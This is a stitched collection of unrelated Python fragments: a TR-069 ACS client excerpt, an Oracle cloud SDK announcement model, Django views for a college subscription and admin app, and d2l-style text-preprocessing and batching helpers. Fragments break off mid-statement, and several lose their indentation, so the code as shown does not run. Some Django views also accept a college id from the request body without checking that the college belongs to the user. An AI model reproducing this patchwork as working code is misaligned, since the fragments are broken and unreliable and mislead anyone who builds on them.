    :param FailureURL: URL to access in case the Download API execution failed
    :type FailureURL: string
    :return: parsed Download response
    """
    if self.cpeid is None:
        self.cpeid = self.dev.board._cpeid
    # NOTE: _build_input_structs expects the arguments in exactly this
    # (alphabetical) order for action="DOWNLOAD".
    param = [
        CommandKey,
        DelaySeconds,
        FailureURL,
        FileSize,
        FileType,
        Password,
        SuccessURL,
        TargetFileName,
        URL,
        Username,
    ]
    p, cmd, cpe_id = self._build_input_structs(self.cpeid,
                                               param,
                                               action="DOWNLOAD")
    with self.client.settings(raw_response=True):
        response = self.client.service.Download(CommandOptions=cmd,
                                                CPEIdentifier=cpe_id,
                                                Parameters=p)
    return AxirosACS._parse_soap_response(response)
if __name__ == "__main__":
from pprint import pprint
import sys
"""Good values to test:
Device.DeviceInfo.ModelNumber
Device.DeviceInfo.SoftwareVersion
Device.DeviceInfo.Processor
NOTE: big queries may timeout
To use from cmdline change:
from . import base_acs
to:
from boardfarm.devices import base_acs
some cmd line samples (user/passwd from json serial no from ACS gui):
# this must work
python3 ./axiros_acs.py ip:port user passwd serialno GVP "'Device.DeviceInfo.ModelNumber'"
# this must fail
python3 ./axiros_acs.py ip:port user passwd serailno GVP "'Device.DeviceInfo.ModelNumber1'"
# this must fail
python3 ./axiros_acs.py ip:port user passwd serialno SVP "{'Device.DeviceInfo.ModelNumber':'mik'}"
# this should work
python3 ./axiros_acs.py ip:port user passwod serialno SVP "[{'Device.WiFi.AccessPoint.1.AC.1.Alias':'mok_1'}, {'Device.WiFi.AccessPoint.2.AC.1.Alias':'mik_2'}]"
# this must fail
python3 ./axiros_acs.py ip:port user passwd serialno SVP "[{'Device.WiFi.AccessPoint.1.AC.1.Alias':'mok_1'}, {'Device.WiFi.AccessPoint.2.AC.1.Alias':2}]"
"""
if len(sys.argv) | |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class BaseAnnouncement(object):
"""
Incident information that forms the basis of an announcement. Avoid entering confidential information.
"""
#: A constant which can be used with the time_one_type property of a BaseAnnouncement.
#: This constant has a value of "ACTION_REQUIRED_BY"
TIME_ONE_TYPE_ACTION_REQUIRED_BY = "ACTION_REQUIRED_BY"
#: A constant which can be used with the time_one_type property of a BaseAnnouncement.
#: This constant has a value of "NEW_START_TIME"
TIME_ONE_TYPE_NEW_START_TIME = "NEW_START_TIME"
#: A constant which can be used with the time_one_type property of a BaseAnnouncement.
#: This constant has a value of "ORIGINAL_END_TIME"
TIME_ONE_TYPE_ORIGINAL_END_TIME = "ORIGINAL_END_TIME"
#: A constant which can be used with the time_one_type property of a BaseAnnouncement.
#: This constant has a value of "REPORT_DATE"
TIME_ONE_TYPE_REPORT_DATE = "REPORT_DATE"
#: A constant which can be used with the time_one_type property of a BaseAnnouncement.
#: This constant has a value of "START_TIME"
TIME_ONE_TYPE_START_TIME = "START_TIME"
#: A constant which can be used with the time_one_type property of a BaseAnnouncement.
#: This constant has a value of "TIME_DETECTED"
TIME_ONE_TYPE_TIME_DETECTED = "TIME_DETECTED"
#: A constant which can be used with the time_two_type property of a BaseAnnouncement.
#: This constant has a value of "END_TIME"
TIME_TWO_TYPE_END_TIME = "END_TIME"
#: A constant which can be used with the time_two_type property of a BaseAnnouncement.
#: This constant has a value of "NEW_END_TIME"
TIME_TWO_TYPE_NEW_END_TIME = "NEW_END_TIME"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "ACTION_RECOMMENDED"
ANNOUNCEMENT_TYPE_ACTION_RECOMMENDED = "ACTION_RECOMMENDED"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "ACTION_REQUIRED"
ANNOUNCEMENT_TYPE_ACTION_REQUIRED = "ACTION_REQUIRED"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "EMERGENCY_CHANGE"
ANNOUNCEMENT_TYPE_EMERGENCY_CHANGE = "EMERGENCY_CHANGE"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "EMERGENCY_MAINTENANCE"
ANNOUNCEMENT_TYPE_EMERGENCY_MAINTENANCE = "EMERGENCY_MAINTENANCE"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "EMERGENCY_MAINTENANCE_COMPLETE"
ANNOUNCEMENT_TYPE_EMERGENCY_MAINTENANCE_COMPLETE = "EMERGENCY_MAINTENANCE_COMPLETE"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "EMERGENCY_MAINTENANCE_EXTENDED"
ANNOUNCEMENT_TYPE_EMERGENCY_MAINTENANCE_EXTENDED = "EMERGENCY_MAINTENANCE_EXTENDED"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "EMERGENCY_MAINTENANCE_RESCHEDULED"
ANNOUNCEMENT_TYPE_EMERGENCY_MAINTENANCE_RESCHEDULED = "EMERGENCY_MAINTENANCE_RESCHEDULED"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "INFORMATION"
ANNOUNCEMENT_TYPE_INFORMATION = "INFORMATION"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "PLANNED_CHANGE"
ANNOUNCEMENT_TYPE_PLANNED_CHANGE = "PLANNED_CHANGE"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "PLANNED_CHANGE_COMPLETE"
ANNOUNCEMENT_TYPE_PLANNED_CHANGE_COMPLETE = "PLANNED_CHANGE_COMPLETE"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "PLANNED_CHANGE_EXTENDED"
ANNOUNCEMENT_TYPE_PLANNED_CHANGE_EXTENDED = "PLANNED_CHANGE_EXTENDED"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "PLANNED_CHANGE_RESCHEDULED"
ANNOUNCEMENT_TYPE_PLANNED_CHANGE_RESCHEDULED = "PLANNED_CHANGE_RESCHEDULED"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "PRODUCTION_EVENT_NOTIFICATION"
ANNOUNCEMENT_TYPE_PRODUCTION_EVENT_NOTIFICATION = "PRODUCTION_EVENT_NOTIFICATION"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "SCHEDULED_MAINTENANCE"
ANNOUNCEMENT_TYPE_SCHEDULED_MAINTENANCE = "SCHEDULED_MAINTENANCE"
#: A constant which can be used with the lifecycle_state property of a BaseAnnouncement.
#: This constant has a value of "ACTIVE"
LIFECYCLE_STATE_ACTIVE = "ACTIVE"
#: A constant which can be used with the lifecycle_state property of a BaseAnnouncement.
#: This constant has a value of "INACTIVE"
LIFECYCLE_STATE_INACTIVE = "INACTIVE"
#: A constant which can be used with the platform_type property of a BaseAnnouncement.
#: This constant has a value of "IAAS"
PLATFORM_TYPE_IAAS = "IAAS"
#: A constant which can be used with the platform_type property of a BaseAnnouncement.
#: This constant has a value of "SAAS"
PLATFORM_TYPE_SAAS = "SAAS"
def __init__(self, **kwargs):
"""
Initializes a new BaseAnnouncement object with values from keyword arguments. This class has the following subclasses and if you are using this class as input
to a service operations then you should favor using a subclass over the base class:
* :class:`~oci.announcements_service.models.AnnouncementSummary`
* :class:`~oci.announcements_service.models.Announcement`
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param id:
The value to assign to the id property of this BaseAnnouncement.
:type id: str
:param type:
The value to assign to the type property of this BaseAnnouncement.
:type type: str
:param reference_ticket_number:
The value to assign to the reference_ticket_number property of this BaseAnnouncement.
:type reference_ticket_number: str
:param summary:
The value to assign to the summary property of this BaseAnnouncement.
:type summary: str
:param time_one_title:
The value to assign to the time_one_title property of this BaseAnnouncement.
:type time_one_title: str
:param time_one_type:
The value to assign to the time_one_type property of this BaseAnnouncement.
Allowed values for this property are: "ACTION_REQUIRED_BY", "NEW_START_TIME", "ORIGINAL_END_TIME", "REPORT_DATE", "START_TIME", "TIME_DETECTED"
:type time_one_type: str
:param time_one_value:
The value to assign to the time_one_value property of this BaseAnnouncement.
:type time_one_value: datetime
:param time_two_title:
The value to assign to the time_two_title property of this BaseAnnouncement.
:type time_two_title: str
:param time_two_type:
The value to assign to the time_two_type property of this BaseAnnouncement.
Allowed values for this property are: "END_TIME", "NEW_END_TIME"
:type time_two_type: str
:param time_two_value:
The value to assign to the time_two_value property of this BaseAnnouncement.
:type time_two_value: datetime
:param services:
The value to assign to the services property of this BaseAnnouncement.
:type services: list[str]
:param affected_regions:
The value to assign to the affected_regions property of this BaseAnnouncement.
:type affected_regions: list[str]
:param announcement_type:
The value to assign to the announcement_type property of this BaseAnnouncement.
Allowed values for this property are: "ACTION_RECOMMENDED", "ACTION_REQUIRED", "EMERGENCY_CHANGE", "EMERGENCY_MAINTENANCE", "EMERGENCY_MAINTENANCE_COMPLETE", "EMERGENCY_MAINTENANCE_EXTENDED", "EMERGENCY_MAINTENANCE_RESCHEDULED", "INFORMATION", "PLANNED_CHANGE", "PLANNED_CHANGE_COMPLETE", "PLANNED_CHANGE_EXTENDED", "PLANNED_CHANGE_RESCHEDULED", "PRODUCTION_EVENT_NOTIFICATION", "SCHEDULED_MAINTENANCE"
:type announcement_type: str
:param lifecycle_state:
The value to assign to the lifecycle_state property of this BaseAnnouncement.
Allowed values for this property are: "ACTIVE", "INACTIVE"
:type lifecycle_state: str
:param is_banner:
The value to assign to the is_banner property of this BaseAnnouncement.
:type is_banner: bool
:param time_created:
The value to assign to the time_created property of this BaseAnnouncement.
:type time_created: datetime
:param time_updated:
The value to assign to the time_updated property of this BaseAnnouncement.
:type time_updated: datetime
:param environment_name:
The value to assign to the environment_name property of this BaseAnnouncement.
:type environment_name: str
:param platform_type:
The value to assign to the platform_type property of this BaseAnnouncement.
Allowed values for this property are: "IAAS", "SAAS"
:type platform_type: str
"""
self.swagger_types = {
'id': 'str',
'type': 'str',
'reference_ticket_number': 'str',
'summary': 'str',
'time_one_title': 'str',
'time_one_type': 'str',
'time_one_value': 'datetime',
'time_two_title': 'str',
'time_two_type': 'str',
'time_two_value': 'datetime',
'services': 'list[str]',
'affected_regions': 'list[str]',
'announcement_type': 'str',
'lifecycle_state': 'str',
'is_banner': 'bool',
'time_created': 'datetime',
'time_updated': 'datetime',
'environment_name': 'str',
'platform_type': 'str'
}
self.attribute_map = {
'id': 'id',
'type': 'type',
'reference_ticket_number': 'referenceTicketNumber',
'summary': 'summary',
'time_one_title': 'timeOneTitle',
'time_one_type': 'timeOneType',
'time_one_value': 'timeOneValue',
'time_two_title': 'timeTwoTitle',
'time_two_type': 'timeTwoType',
'time_two_value': 'timeTwoValue',
'services': 'services',
'affected_regions': 'affectedRegions',
'announcement_type': 'announcementType',
'lifecycle_state': 'lifecycleState',
'is_banner': 'isBanner',
'time_created': 'timeCreated',
'time_updated': 'timeUpdated',
'environment_name': 'environmentName',
'platform_type': 'platformType'
}
self._id = None
self._type = None
self._reference_ticket_number = None
self._summary = None
self._time_one_title = None
self._time_one_type = None
self._time_one_value = None
self._time_two_title = None
self._time_two_type = None
self._time_two_value = None
self._services = None
self._affected_regions = None
self._announcement_type = None
self._lifecycle_state = None
self._is_banner = None
self._time_created = None
self._time_updated = None
self._environment_name = | |
import json
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import Group
from django.db import IntegrityError
from django.http import JsonResponse, HttpResponse
from django.shortcuts import render, redirect
from ..decorators import allowed_users
from ..models import *
from .auth_views import *
from .sybadmin_views import *
from .teacher_views import *
from .student_views import *
from .teach_stud_commonviews import *
@login_required
@allowed_users(allowed_roles=['collegeadmin'])
def college_page(request):
    """Render the college-admin dashboard with headline statistics.

    Lists the teachers, departments, classes and students of the logged-in
    admin's college and counts the assignments posted in / submitted to it.
    """
    teachers = Teacher.objects.filter(college=request.user.college)
    departments = Department.objects.filter(college=request.user.college)
    classes = CollegeClass.objects.filter(college=request.user.college)
    students = Student.objects.filter(college=request.user.college)
    # Count in the database instead of materialising every post/solution in
    # Python: the `__in` lookups produce the same totals as the original
    # list comprehensions, but as a single SQL query each.
    total_number_of_assignments = ClassWorkPost.objects.filter(
        is_assignment=True, college_class__in=classes).count()
    number_of_submitted_assignments = AssignmentSolution.objects.filter(
        student__in=students).count()
    context_dict = {
        'teachers': teachers,
        'departments': departments,
        'classes': classes,
        'students': students,
        'total_number_of_assignments': total_number_of_assignments,
        'number_of_submitted_assignments': number_of_submitted_assignments,
        'number_of_students': len(students),
        'number_of_teachers': len(teachers),
    }
    return render(request, template_name='college/admin/college_admin.html', context=context_dict)
@login_required
def renew_plan(request):
    """Renew the college's subscription plan (collegeadmin only).

    GET renders the plan-selection page, unless the current plan is active
    with more than 15 days left, in which case the user is sent back to the
    account page.  POST performs the renewal and creates a paid Invoice.
    """
    # We cannot use allowed_users decorator for this view because
    # using that decorator will force the user to plan_cancelled
    # view and refrain him/her from renewing the subscription plan.
    if request.user.groups.all()[0].name == 'collegeadmin':
        if request.method == 'POST':
            plan_selected = request.POST.get('plan_selected')
            cardnumber = request.POST.get('cardnumber')
            # Normalise the card number: drop the spaces typed in the form.
            cardnumber = cardnumber.replace(' ', '')
            # NOTE(review): cardcvv is read but never used below — presumably
            # reserved for the payment processing stub; confirm before removal.
            cardcvv = request.POST.get('cardcvv')
            plan = None
            try:
                plan = Plan.objects.get(pk=plan_selected)
            except Exception as err:
                # Invalid/missing plan id: surface the error and retry.
                messages.error(request, f'{err}')
                return redirect(renew_plan)
            college = request.user.college
            college.renew(plan=plan, card_info=cardnumber)
            college.save()
            # NOTE: Here you can add backend payment processing
            # process payments here and generate invoice
            invoice = Invoice.objects.create(
                college=request.user.college,
                plan_subscribed=plan,
            )
            invoice.pay()
            invoice.save()
            return redirect(college_admin_account)
        # Plenty of time left on an active plan: no renewal needed yet.
        if request.user.college.days_left() > 15 and request.user.college.subscription_active:
            return redirect(college_admin_account)
        plans = Plan.objects.all()
        context_dict = {
            'plans': plans,
        }
        return render(request, template_name='college/admin/renew_plan.html', context=context_dict)
    else:
        return HttpResponse('You are not authorized to view this page')
@login_required
@allowed_users(allowed_roles=['collegeadmin'])
def cancel_plan(request):
    """AJAX endpoint that deactivates a college's subscription.

    Expects a POST whose JSON body carries ``college_id``; answers with a
    JSON payload describing success or failure.
    """
    if request.method != 'POST':
        # Only POST is accepted by this endpoint.
        return JsonResponse({
            'process': 'failed',
            'msg': 'GET method is not supported by this endpoint',
        })
    payload = json.loads(request.body)
    college = College.objects.get(pk=payload['college_id'])
    if college.subscription_end_date < datetime.now().date():
        # Plan already expired — nothing to cancel.
        return JsonResponse({
            'process': 'failed',
            'msg': 'Your plan is not active. Please renew your plan in order to continue using our product.',
        })
    college.cancel_plan()
    college.save()
    return JsonResponse({
        'process': 'success',
        'msg': 'Your plan/subscription has been deactivated. '
               'Please renew your plan in order to continue using our product.',
    })
@login_required
def plan_cancelled(request):
    """Show the plan-cancelled page when the user's college has no active
    subscription; otherwise bounce the user back to their account page.

    The allowed_users decorator cannot be used here: it would redirect back
    to this very view and produce a 'too many redirects' loop.
    """
    role = request.user.groups.all()[0].name
    if role == 'collegeadmin':
        college = request.user.college
        account_view = college_admin_account
    elif role == 'teacher':
        college = request.user.teacher.college
        account_view = college_teacher_student_account
    elif role == 'student':
        college = request.user.student.college
        account_view = college_teacher_student_account
    else:
        return HttpResponse('You are not authorized to view this page')
    if not college.subscription_active or college.days_left() < 1:
        return render(request, template_name='college/admin/plan_cancelled.html')
    return redirect(account_view)
@login_required
@allowed_users(allowed_roles=['collegeadmin'])
def college_add_teachers(request, pk=None):
    """Add, update or fetch a teacher of the logged-in admin's college.

    * POST (AJAX, JSON body): ``mode == 'add'`` registers a new User in the
      'teacher' group and creates the Teacher record; any other mode updates
      the teacher identified by ``teacher_id`` in the payload.
    * GET with ``pk``: returns that teacher's data as JSON (edit form).
    * GET without ``pk``: renders the add-teachers page.

    Bug fix: the password handling contained unresolved ``<PASSWORD>``
    placeholders (invalid code).  An empty password field now maps to
    ``None`` and the submitted password is passed to ``set_password``.
    """
    classes_list = [classname['name'] for classname in
                    CollegeClass.objects.filter(college=request.user.college).values('name')]
    if request.method == 'POST':
        # for AJAX request
        data = json.loads(request.body)
        mode = data['mode']
        first_name = data['first_name']
        last_name = data['last_name']
        classes_assigned = data['classes_assigned']
        email_id = data['email_id']
        # An empty string means "no password submitted".
        password1 = None if data['password1'] == '' else data['password1']
        if mode == 'add':
            # request is for adding a new teacher
            try:
                # register the User (username doubles as the email address)
                new_user = User.objects.create_user(
                    first_name=first_name,
                    last_name=last_name,
                    email=email_id,
                    username=email_id,
                )
                new_user.set_password(password1)
                new_user.save()
                # Add this user to the teacher group
                teacher_group = Group.objects.get(name='teacher')
                teacher_group.user_set.add(new_user)
                # Get the college of the current logged in user (collegeadmin user)
                college = request.user.college
                # create a teacher
                clg_teacher = Teacher.objects.create(
                    user=new_user,
                    college=college,
                    first_name=first_name,
                    last_name=last_name,
                    email=email_id,
                )
                # add the assigned classes to this teacher
                for cls in classes_assigned:
                    clg_cls = CollegeClass.objects.get(name=cls, college=request.user.college)
                    clg_teacher.college_classes.add(clg_cls)
                return JsonResponse({
                    'process': 'success',
                    'msg': f'Success! Teacher {first_name} {last_name} has been added to the database.',
                })
            except IntegrityError:
                # Duplicate username/email.
                return JsonResponse({
                    'process': 'failed',
                    'msg': f'Teacher {first_name} {last_name} has already been added to the database.'
                })
            except Exception as err:
                return JsonResponse({'process': 'failed', 'msg': f'{err}'})
        else:
            # AJAX request for updating an existing teacher.  Password
            # validation is not done client-side for this form, so the
            # payload also carries password2 for server-side matching.
            password2 = None if data['password2'] == '' else data['password2']
            try:
                # Get the teacher by pk (id) and update the data
                clg_teacher_id = data['teacher_id']
                clg_teacher = Teacher.objects.get(pk=clg_teacher_id, college=request.user.college)
                clg_teacher.first_name = first_name
                clg_teacher.last_name = last_name
                clg_teacher.email = email_id
                # Now update the User associated (OneToOne) with the Teacher
                clg_teacher.user.email = email_id
                clg_teacher.user.username = email_id
                clg_teacher.user.first_name = first_name
                clg_teacher.user.last_name = last_name
                # Replace the assigned classes with the newly selected set
                clg_teacher.college_classes.clear()
                for cls in classes_assigned:
                    clg_cls = CollegeClass.objects.get(name=cls, college=request.user.college)
                    clg_teacher.college_classes.add(clg_cls)
                # If a password was provided in both fields, require a match
                # before updating it.
                if password1 is not None and password2 is not None:
                    if password1 == password2:
                        clg_teacher.user.set_password(password1)
                    else:
                        return JsonResponse({
                            'process': 'failed',
                            'msg': f'Error! passwords do not match',
                        })
                # Now save the data
                clg_teacher.user.save()
                clg_teacher.save()
                # updated_teacher_data is for updating the html table in the
                # frontend once the request gets processed
                updated_teacher_data = {
                    'id': clg_teacher.id,
                    'first_name': clg_teacher.first_name,
                    'last_name': clg_teacher.last_name,
                    'email_id': clg_teacher.email,
                    'class_list': [cls_name.name for cls_name in clg_teacher.college_classes.all()],
                }
                # Return success message
                return JsonResponse({
                    'process': 'success',
                    'msg': f'{first_name} {last_name}\'s data has been successfully updated.',
                    'updated_data': updated_teacher_data,
                })
            except Exception as err:
                return JsonResponse({
                    'process': 'failed',
                    'msg': f'Error! {err}',
                })
    if pk is not None:
        # AJAX GET request for a single teacher's data by pk (id)
        try:
            teacher = Teacher.objects.get(pk=pk, college=request.user.college)
            teacher_json_obj = {
                'first_name': teacher.first_name,
                'last_name': teacher.last_name,
                'classes_assigned': [teach.name for teach in teacher.college_classes.all()],
                'email_id': teacher.email,
            }
            return JsonResponse({
                'process': 'success',
                'msg': 'Success',
                'teacher_json_obj': teacher_json_obj,
            })
        except Exception as err:
            return JsonResponse({
                'process': 'failed',
                'msg': f'Error! {err}',
            })
    context_dict = {'classes_list': classes_list}
    return render(request, template_name='college/admin/admin_addteachers.html', context=context_dict)
@login_required
@allowed_users(allowed_roles=['collegeadmin'])
def college_del_teachers(request, pk=None):
    """
    AJAX-only view that deletes a teacher (and its linked User) by pk.
    :param request:
    :param pk:
    :return: JsonResponse()
    """
    if request.method != 'POST':
        # Deletion must come through POST.
        return JsonResponse({'process': 'failed', 'msg': 'Error! invalid operation'})
    try:
        teacher = Teacher.objects.get(pk=pk, college=request.user.college)
        # Remove the auth User first, then the Teacher row itself.
        teacher.user.delete()
        teacher.delete()
    except Exception as err:
        return JsonResponse({'process': 'failed', 'msg': f'{err}'})
    return JsonResponse({'process': 'success'})
@login_required
@allowed_users(allowed_roles=['collegeadmin'])
def college_add_classes(request, pk=None):
    """Add or update departments and classes of the admin's college.

    POST (AJAX, JSON body): ``form_type`` selects 'department' or 'class';
    with ``pk`` the request updates an existing record, without it a new
    one is created.  GET renders the add-classes page.
    """
    departments_list = [department['name'] for department in
                        Department.objects.filter(college=request.user.college).values('name')]
    if request.method == 'POST':
        # for AJAX request
        data = json.loads(request.body)
        form_type = data['form_type']
        if form_type == 'department':
            if pk is None:
                # this means that the request came from 'add new department' form
                department_name = data['department_name']
                college = request.user.college
                try:
                    # get_or_create tells us (via `created`) whether this
                    # department already existed for the college.
                    obj, created = Department.objects.get_or_create(
                        college=college,
                        name=department_name,
                    )
                    if not created:
                        # NOTE(review): message contains a duplicated "the";
                        # user-visible string, fix separately.
                        return JsonResponse({
                            'process': 'failed',
                            'msg': f'{department_name} department already exists in the the database.',
                        })
                    return JsonResponse({
                        'process': 'success',
                        'msg': f'Success! {department_name} department added to the database.',
                        'departments_list': departments_list,
                    })
                except IntegrityError:
                    return JsonResponse({'process': 'failed', 'msg': f'{department_name} already exists.'})
                except Exception as err:
                    return JsonResponse({'process': 'failed', 'msg': f'{err}'})
            else:
                # this request came for updating an existing department's fields
                department_name = data['department_name']
                try:
                    dep = Department.objects.get(pk=pk, college=request.user.college)
                    dep.name = department_name
                    dep.save()
                    return JsonResponse({
                        'process': 'success',
                        'department_name': f'{dep.name}',
                    })
                except IntegrityError:
                    # Renaming collided with an existing department.
                    return JsonResponse({
                        'process': 'failed',
                        'msg': 'Duplicate value error',
                    })
                except Exception as err:
                    return JsonResponse({
                        'process': 'failed',
                        'msg': f'{err}',
                    })
        elif form_type == 'class':
            if pk is None:
                # this means that the request came from 'add new classes' form
                class_name = data['class_name']
                department = Department.objects.get(name=data['department_name'], college=request.user.college)
                college = request.user.college
                try:
                    obj, created = CollegeClass.objects.get_or_create(
                        college=college,
                        name=class_name,
                        department=department,
                    )
                    if not created:
                        return JsonResponse({
                            'process': 'failed',
                            'msg': f'{class_name} class already exists under {department.name} department',
                            'departments_list': departments_list,
                        })
                    return JsonResponse({
                        'process': 'success',
                        'msg': f'Success! {class_name} class added under {department.name}',
                        'departments_list': departments_list,
                    })
                except IntegrityError:
                    return JsonResponse({'process': 'failed',
                                         'msg': f'{class_name} already exists under {department.name} department'})
                except Exception as err:
                    return JsonResponse({'process': 'failed', 'msg': f'{err}'})
            else:
                # this request came for updating an existing class's fields
                class_name = data['class_name']
                department_name = data['department_name']
                try:
                    cls = CollegeClass.objects.get(pk=pk)
                    cls.name = class_name
                    # The class can also be moved to a different department.
                    cls.department = Department.objects.get(name=department_name, college=request.user.college)
                    cls.save()
                    return JsonResponse({
                        'process': 'success',
                        'class_name': f'{cls.name}',
                        'department_name': f'{cls.department}',
                    })
                except IntegrityError:
                    return JsonResponse({
                        'process': 'failed',
                        'msg': 'Duplicate value error',
                    })
                except Exception as err:
                    return JsonResponse({
                        'process': 'failed',
                        'msg': f'{err}',
                    })
    context_dict = {
        'departments_list': departments_list,
    }
    return render(request, template_name='college/admin/admin_addclasses.html', context=context_dict)
@login_required
@allowed_users(allowed_roles=['collegeadmin'])
def college_del_classes(request, pk=None):
"""
This view is for handling AJAX requests only for deleting classes.
:param request:
:param pk:
:return: JsonResponse()
"""
if request.method | |
time machine book into a list of sentences."""
with open('../data/timemachine.txt', 'r') as f:
lines = f.readlines()
return [re.sub('[^A-Za-z]+', ' ', line.strip().lower())
for line in lines]
# Defined in file: ./chapter_recurrent-neural-networks/text-preprocessing.md
def tokenize(lines, token='word'):
    """Split sentences into word or char tokens.

    :param lines: list of sentence strings.
    :param token: tokenization unit, either 'word' or 'char'.
    :return: list of token lists, or None for an unrecognized `token`
        (an error is printed in that case).
    """
    if token == 'word':
        return [line.split(' ') for line in lines]
    elif token == 'char':
        return [list(line) for line in lines]
    else:
        # Typo fix: 'unkown' -> 'unknown'.  Kept as a print (not a raise)
        # to preserve the original control flow.
        print('ERROR: unknown token type ' + token)
# Defined in file: ./chapter_recurrent-neural-networks/text-preprocessing.md
class Vocab(object):
    """Vocabulary mapping between tokens and integer indices.

    Tokens are indexed by descending frequency (ties broken by token order);
    unknown tokens map to `self.unk`.
    """
    def __init__(self, tokens, min_freq=0, use_special_tokens=False):
        counter = count_corpus(tokens)
        # Order by frequency (descending), breaking ties by token — the same
        # ordering as a key-sort followed by a stable frequency sort.
        self.token_freqs = sorted(counter.items(),
                                  key=lambda kv: (-kv[1], kv[0]))
        if use_special_tokens:
            # padding, begin of sentence, end of sentence, unknown
            self.pad, self.bos, self.eos, self.unk = 0, 1, 2, 3
            uniq_tokens = ['<pad>', '<bos>', '<eos>', '<unk>']
        else:
            self.unk = 0
            uniq_tokens = ['<unk>']
        # Keep only tokens meeting the frequency threshold.
        for tok, freq in self.token_freqs:
            if freq >= min_freq and tok not in uniq_tokens:
                uniq_tokens.append(tok)
        self.idx_to_token = []
        self.token_to_idx = dict()
        for tok in uniq_tokens:
            self.token_to_idx[tok] = len(self.idx_to_token)
            self.idx_to_token.append(tok)

    def __len__(self):
        return len(self.idx_to_token)

    def __getitem__(self, tokens):
        # A list/tuple of tokens maps element-wise; a single token maps to
        # its index, defaulting to the unknown index.
        if isinstance(tokens, (list, tuple)):
            return [self[tok] for tok in tokens]
        return self.token_to_idx.get(tokens, self.unk)

    def to_tokens(self, indices):
        # Inverse of __getitem__: indices back to token strings.
        if isinstance(indices, (list, tuple)):
            return [self.idx_to_token[i] for i in indices]
        return self.idx_to_token[indices]
# Defined in file: ./chapter_recurrent-neural-networks/text-preprocessing.md
def count_corpus(sentences):
    """Flatten a list of token lists and count token frequencies."""
    flat = []
    for line in sentences:
        flat.extend(line)
    return collections.Counter(flat)
# Defined in file: ./chapter_recurrent-neural-networks/text-preprocessing.md
def load_corpus_time_machine(max_tokens=-1):
    """Return the time machine text as char indices plus its Vocab.

    A positive `max_tokens` truncates the corpus to that many characters.
    """
    char_tokens = tokenize(read_time_machine(), 'char')
    vocab = Vocab(char_tokens)
    corpus = []
    # Flatten line-by-line; Vocab maps a list of chars to a list of indices.
    for line in char_tokens:
        corpus.extend(vocab[line])
    if max_tokens > 0:
        corpus = corpus[:max_tokens]
    return corpus, vocab
# Defined in file: ./chapter_recurrent-neural-networks/lang-model.md
def seq_data_iter_random(corpus, batch_size, num_steps):
    """Yield (X, Y) minibatches of length-`num_steps` subsequences sampled
    at shuffled offsets of `corpus`; Y is X shifted one token ahead.

    Yields MXNet NDArrays of shape (batch_size, num_steps).
    """
    # Offset the iterator over the data for uniform starts
    corpus = corpus[random.randint(0, num_steps):]
    # Subtract 1 extra since we need to account for label
    num_examples = ((len(corpus) - 1) // num_steps)
    example_indices = list(range(0, num_examples * num_steps, num_steps))
    random.shuffle(example_indices)
    # This returns a sequence of the length num_steps starting from pos
    data = lambda pos: corpus[pos: pos + num_steps]
    # Discard half empty batches
    num_batches = num_examples // batch_size
    for i in range(0, batch_size * num_batches, batch_size):
        # Batch_size indicates the random examples read each time
        batch_indices = example_indices[i:(i+batch_size)]
        X = [data(j) for j in batch_indices]
        # Labels: the same windows shifted forward by one position.
        Y = [data(j + 1) for j in batch_indices]
        yield nd.array(X), nd.array(Y)
# Defined in file: ./chapter_recurrent-neural-networks/lang-model.md
def seq_data_iter_consecutive(corpus, batch_size, num_steps):
    """Yield (X, Y) minibatches whose subsequences are consecutive across
    batches, so hidden state can be carried from one batch to the next."""
    # Offset for the iterator over the data for uniform starts
    offset = random.randint(0, num_steps)
    # Slice out data - ignore num_steps and just wrap around
    num_indices = ((len(corpus) - offset - 1) // batch_size) * batch_size
    Xs = nd.array(corpus[offset:offset+num_indices])
    # Labels are the inputs shifted forward by one token.
    Ys = nd.array(corpus[offset+1:offset+1+num_indices])
    Xs, Ys = Xs.reshape((batch_size, -1)), Ys.reshape((batch_size, -1))
    num_batches = Xs.shape[1] // num_steps
    for i in range(0, num_batches * num_steps, num_steps):
        X = Xs[:,i:(i+num_steps)]
        Y = Ys[:,i:(i+num_steps)]
        yield X, Y
# Defined in file: ./chapter_recurrent-neural-networks/lang-model.md
class SeqDataLoader(object):
    """An iterator to load sequence data, re-creating a fresh minibatch
    generator each time iteration starts."""
    def __init__(self, batch_size, num_steps, use_random_iter, max_tokens):
        # Choose the sampling strategy once, up front.
        iter_fn = (d2l.seq_data_iter_random if use_random_iter
                   else d2l.seq_data_iter_consecutive)
        self.corpus, self.vocab = d2l.load_corpus_time_machine(max_tokens)
        self.get_iter = lambda: iter_fn(self.corpus, batch_size, num_steps)
    def __iter__(self):
        return self.get_iter()
# Defined in file: ./chapter_recurrent-neural-networks/lang-model.md
def load_data_time_machine(batch_size, num_steps, use_random_iter=False,
                           max_tokens=10000):
    """Return a minibatch iterator over the time machine data and its Vocab."""
    loader = SeqDataLoader(batch_size, num_steps, use_random_iter, max_tokens)
    return loader, loader.vocab
